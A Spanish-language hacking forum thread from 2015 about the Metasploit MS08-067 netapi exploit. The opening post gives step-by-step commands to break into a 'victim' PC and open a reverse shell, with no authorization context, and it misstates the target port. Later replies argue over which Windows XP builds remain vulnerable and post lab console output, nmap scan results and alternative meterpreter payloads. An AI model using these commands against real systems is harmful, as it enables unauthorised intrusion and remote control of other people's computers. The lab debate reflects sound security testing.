comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Metasploit | Penetrar una pc. [Exploit]

  • 21 Respuestas
  • 16667 Vistas

0 Usuarios y 3 Visitantes están viendo este tema.

Desconectado Payasako

  • *
  • Underc0der
  • Mensajes: 86
  • Actividad:
    3.33%
  • Reputación 0
  • Éxito o fracaso, libertad o condena.
    • Ver Perfil
  • Skype: -
  • Twitter: @Payasak0
« en: Febrero 17, 2015, 06:06:43 pm »

Metasploit | Penetrar una pc.

En este post os pondre un exploit , que sirve para penetrar en una pc.  Me explico mejor paso a paso. Primero teneis que abrir la consola metasploit , si no la teneis descargarla aqui: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Bueno ya tenemos abierta la consola pues ahora pondremos el exploit que queremos usar en este caso es netapi:
Citar
use exploit/windows/smb/ms08_067_netapi

Le damos enter y seguimos , ya tenemos el exploit pues procederemos a decirle a la consola que qué dirección IP queremos atacar o penetrar en este caso metemos este codigo:
Citar
set RHOST 000.000.000.000 <- En 000.000.000.000 pondremos la IP a la que queremos atacar.

Ahora meteremos el payload que sera como una shell:
Citar
set payload windows/shell/reverse_tcp

Vamos bien , ahora le tenemos que decir a metasploit quien somos pues para eso usaremos el comando:
Citar
set LHOST 000.000.000.000 <- En 000.000.000.000 pondremos nuestra IP

Y ahora mandaremos el exploit con un simple comando:
Citar
exploit

Bueno ya dejamos que cargue y eso , y una vez con acceso pues podemos poner help y te saldran muchos comandos y podras controlar la pc que pusiste. Quiero avisar que este exploit solo sirve para que la pc "víctima" tenga el puerto "3555" abierto.

Saludos :)

Desconectado 0v3r_c0d3

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #1 en: Agosto 26, 2015, 11:50:18 pm »
Gracias  :) añado que no es detectable por el antivirus pero si esta el firewall activo no puede funcionar, habría que usar otro método.

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« Respuesta #2 en: Agosto 27, 2015, 12:03:55 am »
Citar
Quiero avisar que este exploit solo sirve para que la pc "víctima" tenga el puerto "3555" abierto.

El puerto 445.
Web: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Twitter: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 214
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #3 en: Agosto 28, 2015, 06:25:20 am »
Yo quisiera añadir también que esta vulnerabilidad sólo afecta a Windows XP SP1. La actualización a SP2 ya corrige el fallo.
Este exploit es de la prehistoria. ¿En serio esperáis tener resultados con él? Salieron muchísimos parches desde entonces.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado MagoAstral

  • *
  • Underc0der
  • Mensajes: 115
  • Actividad:
    0%
  • Reputación 0
  • Nada resulta más engañoso que un hecho evidente.
    • Ver Perfil
« Respuesta #4 en: Agosto 28, 2015, 08:57:41 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Yo quisiera añadir también que esta vulnerabilidad sólo afecta a Windows XP SP1. La actualización a SP2 ya corrige el fallo.
Este exploit es de la prehistoria. ¿En serio esperáis tener resultados con él? Salieron muchísimos parches desde entonces.
Lamento decepcionarte pero el exploit no sólo afecta al service pack 1 de Windows XP. Si dedicas 2 minutos a buscar información sobre dicho exploit en la página principal de rapid7 (No tienes permisos para ver links. Registrate o Entra con tu cuenta) podrás ver que afecta desde el SP1 hasta el SP3 pasando por el SP2 además de Windows 2000 (Universal)  y Windows 2003 (SP1 y SP2). Aclarados estos fallos procederé a contestar a tu segunda inquietud. Cualquier auditor de seguridad lloraría hay muchísimos software que por contrato con la empresa obligan a tener el Windows XP en un service pack desactualizado, en caso contrario no ofertarían su soporte por consiguiente son un buen blanco.
Si tienes más dudas te recomiendo que mires estadísticas!
Salu2
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 214
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #5 en: Agosto 28, 2015, 09:41:04 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Lamento decepcionarte pero el exploit no sólo afecta al service pack 1 de Windows XP. Si dedicas 2 minutos a buscar información sobre dicho exploit en la página principal de rapid7 (No tienes permisos para ver links. Registrate o Entra con tu cuenta) podrás ver que afecta desde el SP1 hasta el SP3 pasando por el SP2 además de Windows 2000 (Universal)  y Windows 2003 (SP1 y SP2).
No sé, chico, pero tus estadísticas se desmienten en el laboratorio.
Para más dudas te recomiendo que montes un hacklab y pruebes las cosas.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado MagoAstral

  • *
  • Underc0der
  • Mensajes: 115
  • Actividad:
    0%
  • Reputación 0
  • Nada resulta más engañoso que un hecho evidente.
    • Ver Perfil
« Respuesta #6 en: Agosto 28, 2015, 10:37:17 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Lamento decepcionarte pero el exploit no sólo afecta al service pack 1 de Windows XP. Si dedicas 2 minutos a buscar información sobre dicho exploit en la página principal de rapid7 (No tienes permisos para ver links. Registrate o Entra con tu cuenta) podrás ver que afecta desde el SP1 hasta el SP3 pasando por el SP2 además de Windows 2000 (Universal)  y Windows 2003 (SP1 y SP2).
No sé, chico, pero tus estadísticas se desmienten en el laboratorio.
Para más dudas te recomiendo que montes un hacklab y pruebes las cosas.
Aquí tienes una prueba de concepto con el mismo exploit que usted ha intentado utilizar:

(No tienes permisos para ver links. Registrate o Entra con tu cuenta). Le recomendaría leer algún tutorial donde expliquen como instalar una máquina virtual en un entorno controlado.
Saludos!
« Última modificación: Agosto 28, 2015, 10:40:14 am por MagoAstral »
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 214
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #7 en: Agosto 28, 2015, 11:02:18 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Aquí tienes una prueba de concepto con el mismo exploit que usted ha intentado utilizar:
1º- Eso no es una prueba de concepto. Si quieres llamarlo de alguna manera llámalo Demo.
2º - Sí, podemos preparar un entorno Windows para que sea vulnerable, pero por defecto no lo es.
3º- ¿A qué viene lo de los entornos virtuales? ¿Eres tonto o qué te pasa? Estas capturas son de máquinas corriendo en VMware. ¿A qué viene eso?

--EDIT--
No busques vídeos de terceros. Prueba lo que dices, como hice yo.
« Última modificación: Agosto 28, 2015, 11:06:46 am por rand0m »
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado MagoAstral

  • *
  • Underc0der
  • Mensajes: 115
  • Actividad:
    0%
  • Reputación 0
  • Nada resulta más engañoso que un hecho evidente.
    • Ver Perfil
« Respuesta #8 en: Agosto 28, 2015, 11:35:17 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Aquí tienes una prueba de concepto con el mismo exploit que usted ha intentado utilizar:
1º- Eso no es una prueba de concepto. Si quieres llamarlo de alguna manera llámalo Demo.
2º - Sí, podemos preparar un entorno Windows para que sea vulnerable, pero por defecto no lo es.
3º- ¿A qué viene lo de los entornos virtuales? ¿Eres tonto o qué te pasa? Estas capturas son de máquinas corriendo en VMware. ¿A qué viene eso?

--EDIT--
No busques vídeos de terceros. Prueba lo que dices, como hice yo.
1º No tienes permisos para ver links. Registrate o Entra con tu cuenta Una prueba de concepto o PoC (por sus siglas en inglés) es una implementación, a menudo resumida o incompleta, de un método o de una idea
2º Acabo de montar un windows xp sp3, desactivado el firewall y explotado correctamente la vulnerabilidad. ¿Magia? Claro no recordaba que era un Mago...
3º Lo primero es que no voy a seguir discutiendo con un necio como es usted, que carece de argumentos y recurre al insulto. Ya no me gustaba esos aires de superioridad, de mirar por encima del hombro y criticar el trabajo de los demás con el tema de los vídeos pero decidí no intervenir. Como asumo que no eras el más rápido de tu clase en comprensión lectora te aclararé, cuando me refería a que mirases un tutorial es porque alomejor estás cometiendo alguna errata en tu laboratorio y ahí subyace el problema de que no puedas realizar tus pruebas de concepto, demostraciones, etc... como quieras llamarlo.
Te dejo unas capturas:
(No tienes permisos para ver links. Registrate o Entra con tu cuenta)
(No tienes permisos para ver links. Registrate o Entra con tu cuenta)
Saludos compañero!
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5395
  • Actividad:
    36.67%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #9 en: Agosto 28, 2015, 04:44:13 pm »
Chicos, me parece genial que se arme debate. Pero haganlo siempre sin insultar.
Los foros estan hechos para debatir, cuidemos la forma nada mas.

Saludos!
ANTRAX


Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 214
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #10 en: Agosto 28, 2015, 05:08:23 pm »
Bueno, visto lo visto he creado una máquina virtual nueva y le he instalado Windows XP SP3, desactivando las actualizaciones automáticas durante la instalación. Los únicos clicks que se hicieron en esta nueva máquina fueron para acceder al Panel de Control y desactivar el firewall.
Al lanzar el exploit no obtenemos un resultado satisfactorio, por eso compruebo la conectividad de la siguiente manera:
  • Hago ping a la máquina WinXPSP3 y ésta responde correctamente (192.168.1.17)
  • Pongo el puerto 4444 a la escucha con netcat y, desde Windows, accedo con Internet Explorer a 192.168.1.15:4444
Ambas pruebas funcionan, por lo que sabemos que la máquina con Kali se comunica correctamente con la máquina Windows y viceversa. Además, por si acaso, me aseguré de que Windows puede realizar conexiones salientes al puerto 4444.
¿Qué ocurre, entonces? Que las instalaciones difieren. Mientras mi disco de Windows instala un sistema parcheado el que utilizó para el ejemplo MagoAstral no instaló tal parche.
Y de ahí que ambos tuviéramos razón: Windows XP SP3 puede ser vulnerable tras la instalación si lo instalamos desde una versión sin parchear. De todas formas los usuarios no suelen desactivar las actualizaciones automáticas, así que si ya es poco probable encontrarnos frente a un WinXP (Sin soporte por parte de M$), menos probable aún será que sea vulnerable a este exploit.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« Respuesta #11 en: Agosto 28, 2015, 05:16:14 pm »
@No tienes permisos para ver links. Registrate o Entra con tu cuenta al parecer lo que esta andando mal es el payload no el exploit, proba con alguna shell inversa como windows/meterpreter/reverse_tcp.

Adjunto: No tienes permisos para ver links. Registrate o Entra con tu cuenta
« Última modificación: Agosto 28, 2015, 05:25:16 pm por q3rv0 »
Web: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Twitter: No tienes permisos para ver links. Registrate o Entra con tu cuenta

Conectado Gabriela

  • *
  • Co Admin
  • Mensajes: 873
  • Actividad:
    0%
  • Reputación 15
    • Ver Perfil
    • Email
« Respuesta #12 en: Agosto 28, 2015, 05:38:25 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Chicos, me parece genial que se arme debate. Pero haganlo siempre sin insultar.
Los foros estan hechos para debatir, cuidemos la forma nada mas.

Saludos!
ANTRAX

Foro, según la tercera acepción de la RAE:

Citar
3. m. Reunión para discutir asuntos de interés actual ante un auditorio que a veces interviene en la discusión.

Precisamente, este tipo de intercambio es lo que dinamizan, enriquecen y permiten aprender. No dejéis de hacerlo, siempre guardando las formas (como dijo ANTRAX) que  -todos- son aportes sumamente interesantes.

Gabi.

Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 214
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #13 en: Agosto 28, 2015, 06:09:29 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
@No tienes permisos para ver links. Registrate o Entra con tu cuenta al parecer lo que esta andando mal es el payload no el exploit, proba con alguna shell inversa como windows/meterpreter/reverse_tcp.
En el primer intento que hice fue el que intenté utilizar. Acabo de usarlo contra la máquina nueva y sigue sin dar resultado.

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.17     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: , , seh, thread, process, none)
   LHOST     192.168.1.14     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
Partiendo de aquí hacemos cuantos intentos queramos, que el resultado es el mismo.
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.14:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.14
LHOST => 192.168.1.14
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.14:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
msf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcp
payload => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
No sé si es que estoy haciendo algo mal (A lo que agradecería que alguien arrojase algo de luz) o es que realmente el Windows no es vulnerable, como venía diciendo desde el principio.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 214
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #14 en: Agosto 29, 2015, 06:58:46 am »
Me respondo a mí mismo para plantear una respuesta:
Citar
Otra hipótesis es que tengas configuradas una políticas de iptables en tu kali de manera que no permite la conexión porque cuando sale el attempting to trigger the vulnerability indica que el meterpreter se ejecuta pero lanza un time out. Puedes probar a cambiar el payload por un bind_tcp.
Otro problema como tu dices sería la red normalmente la gente tiene problema al dejarlo en NAT pero como mencionaste anteriormente la tienes en adaptador puente ¿Has seleccionado replicar el estado?
De primeras el estado de la tarjeta no estaba replicado. Marqué la casilla en la configuración de VMware y arranqué de nuevo. Bien, empezando por las iptables, éstas están desactivadas.
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
root@KaliSana:/home/rand0m# iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination         

Chain FORWARD (policy ACCEPT)
target     prot opt source               destination         

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         
He probado a pasarle un scan de vulnerabilidades con nmap y éste es el resultado.
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
Service Info: OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-check-vulns:
|   MS08-067: NOT VULNERABLE
|   Conficker: Likely CLEAN
|   SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
|   MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_  MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
|_smb-vuln-ms10-054: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms x-c77d82deb3b94.home (192.168.1.17)
Y como llevo intentando desde ayer el exploit sigue sin funcionar.
Sigo afirmando, convencido a un 90%, que mi CD de instalación instaló un Windows XP SP3 parcheado.
Aunque tampoco os calléis. ¡El debate está abierto y más vivo que nunca!
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado MagoAstral

  • *
  • Underc0der
  • Mensajes: 115
  • Actividad:
    0%
  • Reputación 0
  • Nada resulta más engañoso que un hecho evidente.
    • Ver Perfil
« Respuesta #15 en: Agosto 29, 2015, 10:41:07 am »
Por alguna extraña razón (puede que sea un parche o puede que no) tu samba no permite la interactuación NT_STATUS_ACCESS_DENIED podría ser que estuvieran cacheadas las credenciales o algún otro problema de la misma índole pero lo que me extraña es que no comprueba la integridad de exploit ms08_067. Prueba a ejecutar un "check" y veamos que información te devuelve!
Otra cosa es que si podrías pasar el checksum SHA1 de tu ISO a ver si podemos acortar las rutas de solución ;)
Saludos
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 214
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #16 en: Agosto 29, 2015, 11:13:48 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Por alguna extraña razón (puede que sea un parche o puede que no) tu samba no permite la interactuación NT_STATUS_ACCESS_DENIED
Hagamos hincapié en que está recién instalado, con todos los valores por defecto excepto el cortafuegos.
Los checks de metasploit dicen que el objetivo no es vulnerable.
Al pie de foto está el SHA1 de la imagen ISO.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado MagoAstral

  • *
  • Underc0der
  • Mensajes: 115
  • Actividad:
    0%
  • Reputación 0
  • Nada resulta más engañoso que un hecho evidente.
    • Ver Perfil
« Respuesta #17 en: Agosto 29, 2015, 11:52:24 am »
Es que tu has descargado una versión de 2013, tienes que descargarte una iso original no una que haya sido alterada.
Prueba con esta: No tienes permisos para ver links. Registrate o Entra con tu cuenta
Saludos!
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.

Desconectado rand0m

  • *
  • Underc0der
  • Mensajes: 214
  • Actividad:
    0%
  • Reputación 0
  • Paso de cosas personales, déjame
    • Ver Perfil
« Respuesta #18 en: Agosto 29, 2015, 12:00:11 pm »
Usé el torrent que más actividad tenía porque entiendo que es el que más distribuido está.

La gente que usa Windows se descarga versiones con drivers SATA (¿Alguen aquí todavía usa discos PATA?). Los que instalan versiones de Windows oficiales porque así lo tienen contratado en su empresa (O lo que sea) no lo mantendrán desactualizado. Creo que en esto estaremos todos de acuerdo.

Insisto: Este exploit tuvo su época de oro, pero fue hace más de 5 años. Aún así estoy descargando la ISO que dices y voy a buscar (Si no es ésta), la última versión OEM de Windows XP.
Podría vivir perfectamente con una mancha de pis en la alfombra, pero qué va, tío: Más complicaciones.

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #19 en: Agosto 29, 2015, 01:02:42 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Usé el torrent que más actividad tenía porque entiendo que es el que más distribuido está.

La gente que usa Windows se descarga versiones con drivers SATA (¿Alguen aquí todavía usa discos PATA?). Los que instalan versiones de Windows oficiales porque así lo tienen contratado en su empresa (O lo que sea) no lo mantendrán desactualizado. Creo que en esto estaremos todos de acuerdo.

Aquí estas equivocado parcialmente en Bolivia lastimosamente tengo que decirlo ni contando con licencias hasta ahora siguien siendo vulnerables se llega a tocar hasta las puertas en su totalidad, todo depende de la cultura de manejo de parches lo cual recae en los encargados de TI.

Regards,
Snifer
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



 

¿Te gustó el post? COMPARTILO!



Explotando "LNK" con MetaSploit 0-day

Iniciado por Devilboy

Respuestas: 0
Vistas: 1535
Último mensaje Julio 23, 2010, 03:14:24 pm
por Devilboy
Administrador Gráfico de Cyber Ataques para Metasploit

Iniciado por staRgan

Respuestas: 2
Vistas: 1883
Último mensaje Junio 26, 2011, 11:58:52 pm
por Ch05piN
Videos Metasploit desde básico hasta avanzado

Iniciado por dvdr

Respuestas: 24
Vistas: 19253
Último mensaje Abril 28, 2016, 11:40:55 am
por Satyricon
Send vídeo Youtube the victim with Metasploit

Iniciado por BrowserNet

Respuestas: 1
Vistas: 2663
Último mensaje Mayo 23, 2016, 07:46:58 pm
por Random
Usando PRY en el desarrollo de módulos para Metasploit.

Iniciado por morodog

Respuestas: 2
Vistas: 2582
Último mensaje Octubre 05, 2015, 10:42:08 pm
por Stuxnet